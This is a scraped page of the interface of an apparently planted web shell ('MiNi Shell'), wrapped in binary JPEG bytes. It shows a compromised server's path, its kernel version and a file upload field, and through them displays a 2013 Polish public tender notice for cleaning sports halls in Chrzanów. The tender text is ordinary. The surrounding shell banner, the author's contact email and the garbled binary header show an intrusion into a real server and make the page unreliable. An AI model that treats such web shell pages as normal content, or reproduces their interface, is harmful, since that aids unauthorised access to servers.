JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131205/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20131205/501958-N-2013.html

<p class="kh_header"><b>Chrzanów: Sprzątanie i utrzymanie czystości  pomieszczeń w obiektach sportowych oraz utrzymanie terenów przyległych tj. terenów zielonych , ciągów pieszych oraz miejsc parkingowych, będących w zarządzie  spółki - Zarząd Obiektów Powiatowych  
Sp. z o.o. w Chrzanowie,  ul. Zielona 20</b><br>
<b>Numer ogłoszenia: 501958 - 2013; data zamieszczenia: 05.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Obiektów Powiatowych Sp. z o.o. , ul. Zielona 20, 32-500 Chrzanów, woj. małopolskie, tel. 32 712 10 75, 666 268 919.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zop-chrzanow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z.o.o..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzątanie i utrzymanie czystości  pomieszczeń w obiektach sportowych oraz utrzymanie terenów przyległych tj. terenów zielonych , ciągów pieszych oraz miejsc parkingowych, będących w zarządzie  spółki - Zarząd Obiektów Powiatowych  
Sp. z o.o. w Chrzanowie,  ul. Zielona 20.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Sprzątanie i utrzymanie czystości  pomieszczeń w obiektach sportowych oraz utrzymanie terenów przyległych tj. terenów zielonych , ciągów pieszych oraz miejsc parkingowych, będących w zarządzie  spółki - Zarząd Obiektów Powiatowych  Sp. z o.o. w Chrzanowie, ul. Zielona 20.
Szczegółowe zestawienie pomieszczeń i posadzek w halach sportowych oraz wykaz czynności mających zastosowanie we wszystkich obiektach należących do podstawowych obowiązków  Wykonawcy zamówienia określono w załącznikach 5 i 6 do siwz. Nieczystości powstałe w trakcie realizacji przedmiotu umowy należy składać do kontenerów ustawionych przez Zamawiającego , zgodnie z zamieszczonymi na nich oznaczeniami.
Przez utrzymanie terenów przyległych rozumie się :
1) pielęgnację trawników: koszenie oraz grabienie skoszonej trawy, liści i zanieczyszczeń wraz z ich wywozem , utrzymanie krawędzi, odchwaszczanie, 
pielęgnację krzewów: odchwaszczanie,  cięcie pielęgnacyjne.
2) powierzchnie betonowe, kostka brukowa, schody zewnętrzne: bieżące usuwanie wszelkich śmieci, odchwaszczanie, zamiatanie, odśnieżanie, usuwanie lodu i nadmiaru śniegu uniemożliwiającego bezpieczne poruszanie się wokół obiektów.
Ponadto Wykonawca zobowiązany będzie do:
1)Wyznaczenia jednego pracownika do nadzoru i kontaktu z Zamawiającym.
2) Zapewnienia sprzętu i wyposażenia oraz środków chemicznych, myjących, 
   czyszczących, dezynfekujących i toaletowych w ilościach niezbędnych do
   utrzymania obiektów w stałej czystości. Wszystkie środki chemiczne i toaletowe
  stosowane do wykonania niniejszego zamówienia muszą posiadać atesty higieniczne
  dopuszczające je do stosowania na rynku.
3) Wydawania kluczy do szatni najemcom pomieszczeń w  n/w obiektach w godzinach
    ustalonych z Zamawiającym: (w razie potrzeby również w soboty i niedzielę) tj.
    1) hali sportowej przy Zespole Szkół w Libiążu, ul. Górnicza 3,
    2) hali sportowej przy Zespole Szkół Ekonomiczno-Chemicznych w Trzebini, ul.
       Głogowa,
    3) hali sportowej przy I Liceum Ogólnokształcącym w Chrzanowie, ul. Piłsudskiego
       14.
    4) Zgłaszania wszelkich nieprawidłowości , które wystąpią w trakcie realizacji
        przedmiotu zamówienia Zamawiającemu.
    5)Ustalanie wszelkich zmian harmonogramu świadczenia usług  z Zamawiającym.
 
Usługi będące przedmiotem zamówienia Wykonawca świadczył będzie  zgodnie 
z  harmonogramem zatwierdzonym przez Zamawiającego, z uwzględnieniem niżej
określonych ram czasowych:
1) w  hali sportowej przy Zespole Szkół w Libiążu, ul. Górnicza 3,
        hali sportowej przy Zespole Szkół Ekonomiczno-Chemicznych w Trzebini, ul.
        Głogowa,
        hali sportowej przy I Liceum Ogólnokształcącym w Chrzanowie, ul. Piłsudskiego
       14 - codziennie w godzinach pomiędzy 16.00 a 6.00
2) w hali sportowej przy Zespole Szkół Techniczno-Usługowych w Trzebini, ul.
    Gwarków 3 codziennie w godzinach pomiędzy 22.00 a  6.00
 3) w hali sportowej przy Specjalnym Ośrodku Szkolno-Wychowawczym w
    Chrzanowie, ul. Paderewskiego 1,
    codziennie od poniedziałku do piątku  w godzinach pomiędzy 22.00 a 6.00.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających do 30% wartości zamówienia podstawowego i polegających na udzieleniu tego samego rodzaju zamówień.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający  żąda wniesienia wadium w wysokości 12000,00 zł.
Wadium może być wnoszone w jednej lub kilku następujących formach:
pieniądzu,poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej,z  tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,gwarancjach bankowych,gwarancjach ubezpieczeniowych,
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z  dnia 9  listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju
Przedsiębiorczości (Dz. U. nr 109 poz.  1158 ze zmianami)
Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto Zamawiającego
nr 82 8444 0008 0000 0084 2495 0001  Bank Spółdzielczy w Chrzanowie.
Kserokopię dowodu wpłaty należy dołączyć do oferty (kserokopia winna być potwierdzona przez Wykonawcę za zgodność z oryginałem.
W przypadku wnoszenia wadium w formie innej niż gotówka oryginały dokumentów należy dołączyć do oferty.
Uwaga! Wykonawca, który nie wniesie wadium zostanie wykluczony z postępowania.
Zwrot i zatrzymanie wadium.
Zamawiający zwraca wadium na zasadach określonych w art. 46 ustawy Prawo zamówień publicznych (Dz. U. z 2013 r.  poz.907  z późniejszymi zmianami)
1)Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust.  4a.
2)Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
3) Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
4) Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie ust.  1, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
5)Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
6) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o  którym mowa w art.  26 ust.  3, nie złożył dokumentów lub oświadczeń,  o których mowa w art.  25 ust.  1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
7) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana
a)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie
b)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy 
c)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony gdy Wykonawca wykaże,  że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy w tym okresie , wykonywał lub wykonuje min. jedną usługę polegającą na wykonaniu usług podobnych do przedmiotu zamówienia w obiekcie/obiektach  o łącznej powierzchni nie mniejszej niż 2500 m2.Na potwierdzenie Wykonawca przedłoży Wykaz wykonanych  usług, w okresie ostatnich trzech lat przed upływem składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich  przedmiotu, daty wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów,czy zostały wykonane lub są wykonywane należycie. 
Dowodami, o których mowa powyżej jest poświadczenie wykonania usług wraz  z wykazem usług.
W odniesieniu do nadal wykonywanyh usług okresowych lub ciągłych poświadczenie winno być wydane nie wcześniej niż 3 miesiace przed upływem terminu składania ofert.Jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest wstanie uzyskać poświadczenia składa oświadczenie.
W przypadku gdy Zamawiający jest podmiotem, na rzecz którego usługi wskazane w załączniku nr 3, zostały wcześniej wykonane Wykonawca nie ma obowiązku przedkładania dowodów czyli poświadczeń lub oświadczeń; 
Ocena spełnienia warunków przez Wykonawcę zostanie dokonana na podstawie złożonych oświadczeń  i dokumentów wg zasady spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez posiadanie polisy lub innego dowodu ubezpieczenia  od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 100  000,00 zł.
Ocena spełnienia warunków przez Wykonawcę zostanie dokonana na podstawie złożonych oświadczeń  i dokumentów wg zasady spełnia- nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Pełnomocnictwo do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w  postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jego reprezentacji we właściwym rejestrze. 
2) W przypadku gdy Wykonawca będzie polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów,niezależnie od charakteru prawnego łączących go z nimi stosunków, Wykonawca w takiej sytuacji składa pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów
na okres korzystania  z nich przy wykonywaniu zamówienia.
3) kserokopię dowodu wniesienia wadium - w przypadku wniesienia wadium w postaci pieniądza lub oryginał dokumentu potwierdzającego wniesienie wadium - w przypadku wnoszenia wadium winnej formie niż pieniężnej;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Ustawowej zmiany stawki  podatku VAT .
 2) Kluczowego personelu Wykonawcy lub Zamawiającego oraz podwykonawców 
     w przypadku zaistnienia okoliczności uzasadniających zmianę (np. stan zdrowia,
     rezygnacja z pracy, likwidacja firmy podwykonawcy).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zop-chrzanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Obiektów Powiatowych Sp. z o.o.  w Chrzanowie
ul. Zielona 20 pok.202
32-500 Chrzanów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.12.2013 godzina 11:30, miejsce: Zarząd Obiektów Powiatowych Sp. z o.o.  w Chrzanowie
ul. Zielona 20 pokój nr 202
32-500 Chrzanów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com